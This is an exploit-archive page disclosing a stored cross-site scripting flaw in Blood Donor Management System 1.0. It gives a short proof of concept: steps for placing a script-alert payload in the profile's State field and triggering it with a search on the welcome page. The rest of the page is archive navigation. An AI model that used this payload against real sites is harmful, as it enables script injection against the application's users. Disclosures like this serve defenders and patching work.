Blood Donor Management System 1.0 Cross Site Scripting

Blood Donor Management System 1.0 Cross Site Scripting: Posted Aug 15, 2023; Authored by Ehlullah Albayrak; Blood Donor Management System version 1.0 suffers from a persistent cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 3ab40ec2fcd549d03f7ca4fdbf60fd286a3ba512fde3530e785bbc685e75932f; Download | Favorite | View

Blood Donor Management System 1.0 Cross Site Scripting

# Exploit Title: Blood Donor Management System - Stored XSS
# Application: Blood Donor Management System
# Version: v1.0   
# Bugs:  Stored XSS
# Technology: PHP
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/
# Date: 15.08.2023
# Author: Ehlullah Albayrak
# Tested on: Windows


#POC
========================================
1. Login to user account
2. Go to Profile 
3. Change "State" input and add "<script>alert("xss")</script>" payload.
4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered.

#Payload: <script>alert("xss")</script>

Top Authors In Last 30 Days

Red Hat 260 files
Ubuntu 90 files
indoushka 64 files
Jasper Nota 25 files
Gentoo 19 files
Willem Westerhof 19 files
Debian 15 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,090)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,547)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,646)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,459)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,729)
UNIX (9,433)
UnixWare (187)
Windows (6,670)
Other

Blood Donor Management System 1.0 Cross Site Scripting

Blood Donor Management System 1.0 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Blood Donor Management System 1.0 Cross Site Scripting

Share This

Blood Donor Management System 1.0 Cross Site Scripting

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems